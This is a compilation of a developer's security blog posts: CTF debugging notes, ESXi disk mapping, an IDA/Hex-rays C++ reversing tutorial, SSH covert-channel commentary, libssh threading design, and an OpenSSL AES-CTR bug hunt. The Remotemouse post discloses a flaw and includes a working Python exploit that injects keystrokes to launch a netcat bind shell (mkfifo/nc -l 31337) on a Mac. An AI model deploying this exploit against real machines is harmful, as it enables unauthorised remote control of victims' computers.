Notes on debugger: while the write-up lets think I did not use a debugger, I extensively used EDB. Its main pros are : “not GDB”. Its main weakness is : “not GDB”. It was unfortunately not very stable and I couldn’t save a session or breakpoints for later use. Also, it sometimes confused .text/.data and refused to set my breakpoint because it thought it was in .data.
Well, still better than opening core files in gdb.
What I did that worked well:
- Identify crypto
- Use LD_PRELOAD to extract symbol names and instrument the print_license() functions
- patching the anti-debugging patterns in IDA (even tough I could automatize it)
What did not:
- Try for hours to make GDB work
- Not doing a POC in python from the very beginning. I lost too much time doing xor operations in an other window and putting the results back in my shell command
- Trying to patch the binary to make it acceptable for GDB, objdump & friends. I still haven’t found why ld.so can read the file fine and not bfd tools or IDA.
- Discovering edb for the first time that night. I’m sure I underused the capabilities of edb

Adding physical drives to VMware ESXi

I built a new lab environment at home, using VMWare ESXi 5.0, which is a very nice product, if we expect the windows-only GUI 1GB HDD needed to install bloatware. You can do pretty much anything from there, except something that looks so important that I wonder why it’s not on the windows GUI: mapping local disks to VMs.

I made this little post as a reminder for myself rather than a full tutorial. You can get more info on http://blog.davidwarburton.net/2010/10/25/rdm-mapping-of-local-sata-storage-for-esxi, on which this post is based.

In a nutshell:

  1. log on vmware ESXi as root.
  2. locate the name of your fs in /vmfs/devices/disks/, i.e. “/vmfs/devices/disks/t10.ATA_____Hitachi_HDT725025VLA380_______________________VFL104R6CNYSZW
  3. go to where you want to copy it. I suggest you create a directory in a datastore for this, like “/vmfs/volumes/datastore1/harddisks/
  4. vmkfstools -z /vmfs/devices/disks/t10.ATA_____Hitachi_HDT725025VLA380_______________________VFL104R6CNYSZW Hitashi250.vmdk
  5. In your VM, use “attach existing virtual disk” and browse the harddisks directory on datastore.
  6. On linux, you will need “rescan-scsi-bus” to have you new hard disk detected.
  7. Profit

Remotemouse considered harmful

The problem

This weekend I found a nice application to control my mac from my iPhone. It’s Remotemouse from http://www.remotemouse.net.

Unfortunately, when testing I found out that there was no pairing request nor any authentication… I just fired up wireshark to see what was happening and as expected, it’s a very dump cleartext protocol that indicates mouse gestures, clicks, and keyboard events.

I took my editor and went with this little script that connects to my mac, put the mouse on the upper right corner (over the search lense), click it and search for the terminal. Opens it and launches a bindshell.

Remotemouse is binding on all interfaces, ipv4 and ipv6, so if you’re using it and allow direct connections from the outside, you are vulnerable.

The code


#!/usr/bin/python
# Remote exploit against remotemouse (www.remotemouse.net)
#
# Launches a remote shell on macosx leopard
#
# Aris Adamantiadis
#
# aris@darkforce:~/synchronized/hack/remotemouse$ python hackmac.py
# enjoy your shell !!
# Connection to 192.168.1.3 31337 port [tcp/*] succeeded!
# sh: no job control in this shell
# aris@aris-laptop:~$ id
# id
# uid=501(aris) gid=20(staff) groups=20(staff),402(com.apple.sharepoint.group.1),
# 401(com.apple.access_screensharing),204(_developer),100(_lpoperator),
# 98(_lpadmin),81(_appserveradm),80(admin),79(_appserverusr),
# 61(localaccounts),12(everyone),501(access_bpf)
# aris@aris-laptop:~$ exit

import time
import socket
import os
right = "mos 6m 9 0"
up = "mos 6m 0 -9"
diag = "mos 6m 9 -9"
fineup = "mos 6m 0 -1"
fineright = "mos 6m 1 0"
key = "key1 "
click = "mos 5R l d" + "mos 5R l u"
host = "192.168.1.3"
shellcode = "while true ; do rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -l 31337 >/tmp/f ; done&clear;exit"

def keys(v):
f=""
for i in v:
f+= key + i
return f

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,1978))
s.send(up * 200 + right * 400 + fineup * 9 + fineright *9)
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(1)
s.connect((host,1978))
s.send(click)
time.sleep(1)
s.send(keys("terminal"))
time.sleep(.5)
s.send("key3 RTN")
time.sleep(.5)
s.send(keys(shellcode))
time.sleep(.5)
s.send("key3 RTN")
time.sleep(.5)
s.close()
print "enjoy your shell !!"
os.system("nc -v " + host + " 31337")

Reversing C++ programs with IDA pro and Hex-rays

Introduction

During my holidays, I had plenty of time to study and reverse a program, which was completely coded in C++. This was the first time I seriously studied a C++ codebase, using IDA as the only source of information, and found it quite hard.

Here’s a sample of what you get with Hex-rays when you start up digging into an interesting function:

v81 = 9;
v63 = *(_DWORD *)(v62 + 88);
if ( v63 )
{
   v64 = *(int (__cdecl **)(_DWORD, _DWORD, _DWORD,
   _DWORD, _DWORD))(v63 + 24);
   if ( v64 )
     v62 = v64(v62, v1, *(_DWORD *)(v3 + 16), *(_DWORD
     *)(v3 + 40), bstrString);
}

It’s our job to add symbol names, identify classes and set up all the information to help hex-rays in giving us a reliable and certainly understandable output:

padding = *Dst;
if ( padding < 4 )
  return -1;
buffer_skip_bytes(this2->decrypted_input_buffer, 5u);
buffer_skip_end(this2->decrypted_input_buffer, padding);
if ( this2->encrypt_in != null )
{
  if ( this2->compression_in != null )
  {
    buffer_reinit(this2->compression_buffer_in);
    packet_decompress(this2,
      this2->decrypted_input_buffer,
      this2->compression_buffer_in);
    buffer_reinit(this2->decrypted_input_buffer);
    avail_len = buffer_avail_bytes(this2->compression_buffer_in);
    ptr = buffer_get_data_ptr(this2->compression_buffer_in);
    buffer_add_data_and_alloc(this2->decrypted_input_buffer, ptr, avail_len);
  }
}
packet_type = buffer_get_u8(this2->decrypted_input_buffer);
*len = buffer_avail_bytes(this2->decrypted_input_buffer);
this2->packet_len = 0;
return packet_type;

Of course, Hex-rays is not going to invent the names for you, you’ll still have to make sense of the code and what it means to you, but at least, being able to give a name to the classes will certainly help.

All my samples here have been compiled either with visual studio or Gnu C++. I have found the results to be similar, even if they may not be compatible. Fix it for your compiler of interest.

Structure of a C++ program

It is not my goal to teach you how OOP works, you already know that. We’ll just see how it works (and is implemented) in the big lines.

Class = data structure + code (methods).

The data structure can only be seen in the source code, when the methods will appear in your favorite disassembler.

Object = memory allocation + data + virtual functions.

The object is an instantiation of a class, and something you can observe in IDA.  An object needs memory, so you will see a call to new() (or a stack allocation), a call to a constructor and a destructor. You will see accesses to its member variables (embedded objects) and maybe calls to virtual functions.

Virtual functions are silly: it is hard to know, without running the program with breakpoints, what code is going to be executed at runtime (and disassemble it).

Member variables are a bit easier: they work like their counterpart in C (structs), and IDA has a very handy tool to declare structures, and hex-rays handles them very well in the disassembly. Let’s go back to the bits and bytes.

Object creation

int __cdecl sub_80486E4()
{
  void *v0; // ebx@1
  v0 = (void *)operator new(8);
  sub_8048846(v0);
  (**(void (__cdecl ***)(void *))v0)(v0);
  if ( v0 )
    (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0);
  return 0;
}

Here’s the decompilation of a small test program I compiled with G++. We can see the new(8), which means our object is 8 bytes long, even if that doesn’t mean we have 8 bytes of variables.

The function sub_8048846 called just after the new() takes the pointer as parameter, and certainly is the constructor.

The next function call is a little cryptic. It’s doing two pointer deferences on v0 before calling it. It’s a virtual function call.

All polymorphic objects have a special pointer in their variables, called the vtable. This table contains addresses of all the virtual methods, so the C++ program can call them when needed. In the compilers I could test, this vtable is always the first element of an object, and always stays at the same place, even in subclasses. (This could no stay true for multiple inheritance. I did not test).

Let’s do some IDA magic:

Rename the symbols

Just click on a name, press « n » and give a meaningful name. Since we don’t know yet what our class do, I suggest we name the class « class1 », and use this convention until we’ve understood what our class do. It’s very possible that we’re going to discover other classes before we finished digging class1, so I suggest we simply continue naming classes as we find them.

int __cdecl main()
{
  void *v0; // ebx@1
  v0 = (void *)operator new(8);
  class1::ctor(v0);
  (**(void (__cdecl ***)(void *))v0)(v0);
  if ( v0 )
    (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0);
  return 0;
}

Create structures

The « structures » window of IDA is very useful. Type Shift-F9 to make it appear. I suggest you pull it off (in the QT IDA version) and put it on the right of the IDA window, so you can see both the decompile window and the structures.

Press « ins » and create a new structure « class1 ». Since we know that this structure is 8 bytes long, add fields (using key « d ») until we have two « dd » fields. Rename the first to vtable, since yes, that’s what we got here !

Now, we’re going to add typing information in our function. Right-click on v0, « Convert to struct * », select « class1 ». Alternatively, pressing « y » and typing in « class1 * » will give you the same result.

Create a new structure, of 12 bytes, and call it « class1_vtable ». At this state, we cannot really know how big that vtable is, but changing the structure size is very easy. Click on « vtable » in class1’s declaration, and type « y ». Now, declare it as a « class1_vtable * » object. Refresh the pseudocode view, and watch the magic.

We can rename the few methods to « method1 » to « method3 ». Method3 is certainly the destructor. Depending on the programming convention and the compiler used, the first method often is the destructor, but here’s a counterexample. It is time to analyze the constructor.

Analysis of the constructor

int __cdecl class1::ctor(void *a1)
{
  sub_80487B8(a1);
  *(_DWORD *)a1 = &off_8048A38;
  return puts("B::B()");
}

You can start by setting the typing information we already know on « a1 ». The puts() call confirms our thoughts that we are in a constructor, but here we even learn the name of the class.

« sub_80487B8() » is called directly in the constructor. This can be a static method of class1, but it can also be a constructor of a parent-class.

« off_8048A38 » is the vtable of class1. By looking there, you will be able to find out how big is our vtable (just watch the next pointer that has an Xref), and a list of the virtual methods of « class1 ». You can rename them to « class1_mXX », but beware that some of these methods may be shared with other classes.

It is possible to set typing information on the vtable itself (click on it, « y », « class1_vtable »), but I do not recommend it since you lose the classic view in IDA, and it doesn’t provide anything you can’t see in the classic view.

The strange call in the constructor

int __cdecl sub_80487B8(int a1)
{
  int result; // eax@1
  *(_DWORD *)a1 = &off_8048A50;
  puts("A::A()");
  result = a1;
  *(_DWORD *)(a1 + 4) = 42;
  return result;
}

The call to the « sub_80487b8() » function in the constructor reveals us the same type of function: a virtual function table pointer is put in the vtable member, and a puts() tells us we’re in yet another constructor.

Don’t retype the type « class1 » for argument « a1 », since we’re not dealing with class1. We found a new class, that we will call « class2 ». This class is a superclass of class1. Let’s do the same work as in class1. The only difference it that we do not know exactly the size of its member. There are two ways of figuring it out:

  • Look at the xrefs of class2 ::ctor. If we find a straight call to it after a new (i.e. an instantiation), we know the size of its members.
  • Look at the methods in the vtable, and try to guess what’s the highest member ever accessed.

In our case, « class2 ::ctor » accesses the 4 bytes after the 4 first ones and set it to 42. Since its child-class « class1 » is 8 bytes long, so is « class2 ».

Do the same procedure with all the subclasses, and give names to the virtual functions, starting from the parent classes to the children.

Study of the destructors

Let’s go back to our main function. We can see that the last call, before our v0 object becomes a memory leak, is a call to the third virtual method of class2. Let’s study it.

if ( v0 )
  ((void (__cdecl *)(class1 *))
    v0->vtable->method_3)(v0);
…
void __cdecl class1::m3(class1 *a1)
{
  class1::m2(a1);
  operator delete(a1);
}
…
void __cdecl class1::m2(class1 *a1)
{
  a1->vtable = (class1_vtable *)&class1__vtable;
  puts("B::~B()");
  class2::m2((class2 *)a1);
}
…
void __cdecl class2::m2(class2 *a1)
{
  a1->vtable = (class2_vtable *)&class2__vtable;
  puts("A::~A()");
}

What we can see here is the following: class1 ::m3 is a destructor, which calls class1 ::m2 which is the main destructor of class1. What this destructor do is ensure that we’re well in « class1 » context, by setting back the vtable to is « class1 » state. It then calls the destructor of « class2 », which also sets the vtable to « class2 » context. This method can also be used to walk through the whole class hierarchy, since the virtual destructors must always be called for all the classes in the way.

Hey, what are all these casts? Why do I have two structures defining the same fields?

What we have here is exactly the same problem that you get when doing OOP with C : You end up with several fields declared in all the subclasses. Here is what I do to avoid redefinition of fields:

  • For each class, define a classXX_members, classXX_vtable, classXX structure.
  • classXX contains
    • +++ vtable (typed to classXX_vtable *)
    • +++ classXX-1_members (members of the superclass)
    • +++ classXX_members, if any
      • classXX_vtable contains
      • +++classXX-1_vtable
      • +++classXX’s vptrs, if any

 

Ideally, you should start from the main class to the children, until you end up in an edge class. In our exemple, here’s the « solution » of our sample:

 

00000000 class1          struc ; (sizeof=0x8)
00000000 vtable          dd ?                    ; offset
00000004 class2_members  class2_members ?
00000008 class1          ends
00000008
00000000 ; ----------------------------------------------00000000
00000000 class1_members  struc ; (sizeof=0x0)
00000000 class1_members  ends
00000000
00000000 ; ----------------------------------------------00000000
00000000 class1_vtable   struc ; (sizeof=0xC)
00000000 class2_vtable   class2_vtable ?
0000000C class1_vtable   ends
0000000C
00000000 ; ----------------------------------------------00000000
00000000 class2          struc ; (sizeof=0x8)
00000000 vtable          dd ?                    ; offset
00000004 members         class2_members ?
00000008 class2          ends
00000008
00000000 ; ----------------------------------------------00000000
00000000 class2_vtable   struc ; (sizeof=0xC)
00000000 method_1        dd ?                    ; offset
00000004 dtor            dd ?                    ; offset
00000008 delete          dd ?                    ; offset
0000000C class2_vtable   ends
0000000C
00000000 ; ----------------------------------------------00000000
00000000 class2_members  struc ; (sizeof=0x4)
00000000 field_0         dd ?
00000004 class2_members  ends
00000004
int __cdecl main()
{
  class1 *v0; // ebx@1
  v0 = (class1 *)operator new(8);
  class1::ctor(v0);
  ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.method_1)(v0);
  if ( v0 )
    ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.delete)(v0);
  return 0;
}
int __cdecl class1::ctor(class1 *a1)
{
  class2::ctor((class2 *)a1);
  a1->vtable = (class1_vtable *)&class1__vtable;
  return puts("B::B()");
}
class2 *__cdecl class2::ctor(class2 *a1)
{
  class2 *result; // eax@1
  a1->vtable = (class2_vtable *)&class2__vtable;
  puts("A::A()");
  result = a1;
  a1->members.field_0 = 42;
  return result;
}

In brief

  • When you find a new class, give a symbolic name, and resolve the whole tree before figuring out what should be its real name
  • Start from the ancestor and go up to the children
  • Look at the constructors and destructors first, check out the references to new() and static methods.
  • Often, the methods of a same class are located close to each other in the compiled file. Related classes (inheritance) may be far away from each other. Sometimes, the constructors are inlined in childclasses constructors, or even at the place of the instantiation.
  • If you want to spare time when reversing huge inherited structures, use the struct inclusion trick to name variable only once.
  • Use and abuse Hex-rays’ typing system, it’s very powerful.
  • Pure virtual classes are hell : you can find several classes having similar vtables, but no code in common. Beware of them.

Sources

Try this at home !
The binary (elf32 stripped)

The source file. Don’t open it too fast !
 

SSH[12] protocol weakness ?

A weakness ?

While reading the actual posts around the allegations of a so-called backdoor in the OpenBSD IPSec code, which would have been inserted by the FBI through a developer, some comments have been posted on both Slashdot and LWN about “long-standing bugs in SSH2″. The page which details the criticism can be found here. These comments were done by Bernard Perrot when he was patching OpenSSH to comply with the (dumb) restrictions to the use of cryptography in France by the French law.

“I often like to point out an incomprehensible weakness of the protocol concerning the “padding” (known as covered channel): in both version 1 and 2 the packets, have a length which is a multiple of 64 bits, and are padded with a random number. This is quite unusual and therefore sparing a classical fault that is well known in encrypting products: a “hidden” (or “subliminal”) channel. Usually , we “pad” with a verified sequence as for example, give the value n for the byte rank n (self describing padding). In SSH, the sequence being (by definition) randomized, it cannot be checked. Consequently, it is possible that one of the parties communicating could pervert / compromise the communication for example used by a third party who is listening. One can also imagine a corrupted implementation unknown by the two parties (easy to realize on a product provided with only binaries as generally are commercial products). This can easily be done and in this case one only needs to “infect” the client or the server. To leave such an incredible fault in the protocol, even though it is universally known that the installation of a covered channel in an encryption product is THE classic and basic way to corrupt the communication, seems unbelievable to me . It can be interesting to read Bruce Schneier’s remarks concerning the implementation of such elements in products influenced by government agencies. (http://www.counterpane.com/crypto-gram-9902.html#backdoors).”

The author says that SSH1 and SSH2 are vulnerable to covert-channel attack.

Covert-channel attacks

A covert-channel attack is an attack in which an attacker makes use of a protocol to embed data inside it, with the objective of evading intrusion detection software, antivirus, etc. simply to not get caught. The covert-channels exist in almost every protocols at all layers. Hackers used to embed covert rootshells inside ICMP ping datagrams, udp, inside HTTP, inside HTML comments, …

Basically, any protocol that allows two different ways of communicating the same information is vulnerable (and heck most protocols have a lot of ways present the same data in different forms).

A Covert-channel attack is possible on SSH2, by at least two means, as described in the referenced paper :

  • The padding field is said to contain purely random padding. The goal of the padding field is to pad the packet in order to get the whole packet a multiple of the blocksize (a blocksize is the size of cleartext being encrypted/decrypted after each call to a cryptographic routine). It has no cryptographic intent, its content is not checked, but however, it’s encrypted and part of the HMAC (a HMAC primitive is a symmetric and fast tool to verify the integrity of data).
    In order to act as a covert channel, this field has to be filled in by either the SSH server or SSH client, because it is encrypted. Any attempt to change it during the transport will be seen because the HMAC won’t match.
  • There are specific packet types (SSH_IGNORE and SSH_DEBUG) which implementations should accept but discard immediately. Of course, these packets are the best place to insert any data you’d like to send over the encrypted session, but in this case you still need to have a corrupted server and client.

My point here is that these covert channels do exist, but there’s nothing you can do about it at all. The idea of an encrypted session is to ensure the confidentiality end to end. That confidentiality means that you’re free to send any data you want, and nobody will know about it. That also the point on the SSH RFC, 9.3.6 page 20 : the protocol was not designed to avoid covert channels.

Conclusion

My conclusion is simple : it’s not a bug, it’s a feature. Call me when it’s possible to insert data into an encrypted SSH data stream, without knowledge of the session key. At the best of my experience, there is no way to insert data into a stream without altering the integrity of a packet and thus being detected by either of the parties.

If the parties are compromised, there’s no covert channel. One could simply open a channel with its own malicious data and nobody will know. I’m also curious to see how one would design a protocol to transmit encrypted, confidential and arbitrary data which is immune to covert channel attacks, when both sides are compromised. If the attacker couldn’t hide data in the protocol, he’d hide it in the transmitted data.

Threading design pattern ?

When designing the new libssh architecture, we decided to make it completely callback-based, even internally. This provide cool features, like the possibility to extend libssh without recompiling it, or executing more easily asynchronous or nonblocking functions. Libssh 0.5 will run as a state machine, which listen for packets, and then calls callbacks from the packet type. The handlers will evaluate the current state of the session and what to do with packets. Sometimes, the state of the session itself changes as the result of a packet (e.g. when receiving a SSH_AUTH_SUCCESS packet).

A sequence diagram of a synchronous function such as authentication or simple channel read can be systematized as following:

What’s happening is pretty straightforward. The thread X is waiting for a specific packet x (or more precisely, the internal state change caused by packet x). It calls a function called ProcessInput (this is a simplification) which itself locks itself and tries to read packets from the socket. After a packet has been read, the callback for the packet (in this case, x) is called, which updates the internal state of the session.

ProcessInput returns after reading one packet. X verifies that the state changes to x, otherwise, it simply tries a ProcessInput again (not on the drawing) until it receives a state change it can process.

Then, what’s the problem ?

I though that this design could provide an interesting feature to libssh users. By adding a lock in the ProcessInput function (already on the previous drawing), we could let applications call different libssh functions on a same session, simultaneously, in different threads. Thread X could be doing a blocking ssh_channel_read() on one channel while thread Y could be doing the same on another. A naive implementation of locking would give this result :

This sequence diagram is a simple extension of the previous one. Thread X waits for a packet x, and thread Y wait its turn by using a lock (or semaphore) in ProcessInput(Y). Looks great, except there’s a downfall. This exemple does not work if the first packet to show up is not an x packet :

In this example, the x packet never arrives. the ProcessInput called by the X thread receives the y packet and do process it (after all, all threads can manipulate the internal state of the session). The problem is that after ProcessInput has processed the y packet (and left X unhappy and looping in hope of receiving the x packet), ProcessInput(Y)’s lock was released, and Y is doing a packet read, which can be blocking and make the Y thread wait for a moment. This is unfortunate because Y was in the correct state y before calling ReadPacket. Unfortunately, ProcessInput is meant to be generic enough and doesn’t know anything about the x or y states.

I’m looking for some kind of design pattern, or elegant solution to resolve this problem, by those who already resolved this problem before me.

Potential solution ?

I have though of two solutions:

  • A lock would “remember” it was blocked by another thread, would wait until the lock is free and then directly return to the caller. This way, our Y thread would not run the potentially blocking ReadPacket function, in the case thread X made the hard work for him. In the opposite case (our second example), Y would call ProcessInput a second time and catch the y packet soon or later.
    Unfortunately, I do not see an elegant way of doing this with the common denominator building blocks of pthread and win32 threads. It doesn’t look like an elegant solution to me, but it complies with the specification “ProcessInput returns when at least one packet has been read since the call for ProcessInput”.
  • A received packet counter would be read at the start of the ProcessInput function and stored in the local stack. The packet counter would then be incremented each time a packet is received in the session, and after entering in the critical area of ProcessInput, the values would be compared. If it changed, ProcessInput would return.
    I suspect this scenario is vulnerable to races between the moment the function is called and the counter is read. Nothing tells us that another thread did not just finish to read the y packet before we initialize the local packet counter.
  • The ProcessInput function would take an additional parameter which would help it to tell if the ReadPacket function is still worth being called. This could be a callback to be called just after acquiring the lock. For instance, Y could call ProcessInput with a specific callback function check_y() which checks if the status has changed by action of the y packet. This function could also be called by the Y function itself in the ProcessInput loop, since it’s somewhat the termination condition for the loop.
    As a drawback, I think this solution adds additional binding between the ProcessInput function and the potential callers (there are hundreds of them in libssh master) and may add too much complexity.

What’s your opinion ? Feel free to comment !

Aris

Debugging a cryptographic bug in libssh…

Hey there, you may know I am a developer of the SSH Library libssh. Last week, a post on the libssh mailing list was reporting a connection problem under Redhat RHEL 4.8. It seemed that the new cipher aes128-ctr, recently implemented in libssh, had a little problem…

This bug looked strange, firstly because we never ever had any cryptographic problems within libssh, secondly because the debugging did not report something broken :

[3] Set output algorithm to aes256-ctr
[3] Set input algorithm to aes256-ctr

[3] Writing on the wire a packet having 17 bytes before
[3] 17 bytes after comp + 10 padding bytes = 28 bytes packet
[3] Encrypting packet with seq num: 3, len: 32
[3] Sent SSH_MSG_SERVICE_REQUEST (service ssh-userauth)
[3] Decrypting 16 bytes
[3] Packet size decrypted: 44 (0x2c)
[3] Read a 44 bytes packet
[3] Decrypting 32 bytes
2010-04-12 13:14:54,211557; 1126189408 procSrvAuth; Did not receive SERVICE_ACCEPT

While giving on the OpenSSH side :

sshd[22341]: debug1: SSH2_MSG_NEWKEYS sent
sshd[22341]: debug1: expecting SSH2_MSG_NEWKEYS
sshd[22341]: debug1: SSH2_MSG_NEWKEYS received
sshd[22341]: debug1: KEX done
sshd[22341]: Disconnecting: Corrupted MAC on input.

What does this mean ?

libssh was sending garbage and did receive some kind of garbage (a variation of the last error showed a HMAC error). However, the “size” field of the SSH packet (the first 32 bits of every packet) was consistent with the type of packet being received. So what ?
Further analysis of the received plaintext on both openssh and libssh showed that the first 16 bytes of the first packet in each direction were correct. So, this was a bug that was affecting the whole stream excepted the first block of blocksize bytes. The code in libssh producing aes128-ctr is the following:

static void aes_ctr128_encrypt(struct crypto_struct *cipher, void *in, void *out,
unsigned long len, void *IV) {
unsigned char tmp_buffer[128/8];
unsigned int num=0;
/* Some things are special with ctr128 :
* In this case, tmp_buffer is not being used, because it is used to store temporary data
* when an encryption is made on lengths that are not multiple of blocksize.
* Same for num, which is being used to store the current offset in blocksize in CTR
* function.
*/
AES_ctr128_encrypt(in, out, len, cipher->key, IV, tmp_buffer, &num);
}

Then, how does aes-ctr work ?

CTR is a stream cipher mode build on top of a block cipher. In SSH, it’s used like a block cipher anyway. It has two interesting characteristics:

  • The same code is used for encryption and decryption, because it produces a OTP-like stream of bytes
  • The key is used for the block cipher encryption and the input to the algorithm is a nounce together with a counter

That’s where things begin to be interesting. In our code, IV is used as a nounce and is generated from the cryptographic parameters during the key exchange. I have verified its initial value was consistent with the valid (working) implementation. tmp_buffer is a buffer used for internal operations of the cipher. It’s normally not important. The num variable is used to report how far we are in the encryption of the local block, in order to emulate a stream cipher. We are not using this feature (SSH always encrypts packets multiple of the blocksize), so the returned value is always 0.

So now, how goes that libssh with OpenSSL 0.9.8 on my desktop and OpenSSH on RHEL 4.8 work like a charm, and libssh with OpenSSL 0.9.7a on RHEL/CentOS 4.8 does not ?

I had to go one step further and look what could be wrong in the way I am using the AES_ctr128_encrypt function. I looked at the code of OpenSSL 0.9.8 and found this:

* increment counter (128-bit int) by 1 */
static void AES_ctr128_inc(unsigned char *counter) {
unsigned long c;

/* Grab bottom dword of counter and increment */
c = GETU32(counter + 12);
c++; c &= 0xFFFFFFFF;
[...]

This is the code used to increment the counter. And now the surprise in the sources of OpenSSL 0.9.7a :

/* increment counter (128-bit int) by 2^64 */
static void AES_ctr128_inc(unsigned char *counter) {
unsigned long c;

/* Grab 3rd dword of counter and increment */
#ifdef L_ENDIAN
c = GETU32(counter + 8);
[...]

What does that mean ? It means that the counter incrementation is not the same between the two versions of AES-CTR128 ! OpenSSL has a bad and a correct version of the implementation of AES-CTR128. You can find that the CVS commit fixing this dates back from 2003. I found that OpenSSL 0.9.7c fixes the issue. Of course, no documentation explains that difference and nothing in the header files let you know if you’re in front of a broken or working implementation (I would have expected a #define in the working version).

By studying the sources of OpenSSH, I found that they were not affected by the bug because they implemented the CTR encoding by their own. Not wanting to do this, I simply deactivated the compilation of the CTR algorithms on libssh on broken OpenSSL. Yop, “Fixed!”.

Lessons learned

These things are important when you’re debugging a cryptographic thing that produces garbage:

  • Verify the input. Garbage in, garbage out
  • Verify the derivative input like IV. Even a single error of one bit can change the output to garbage
  • Verify the output. It’s possible that the output of the cryptographic algorithm you’re using is good, it’s just not what the other party is reading and trying to decrypt …
  • Verify you’re using correctly the crypto. When the only doc you have, like with libcrypto, is the header file, then read the source.
  • If all of this did not work… read the source of the crypto and find what’s the difference between the working implementation and the wrong implementation. Maybe it’s something you did not understand and used wrongly, maybe …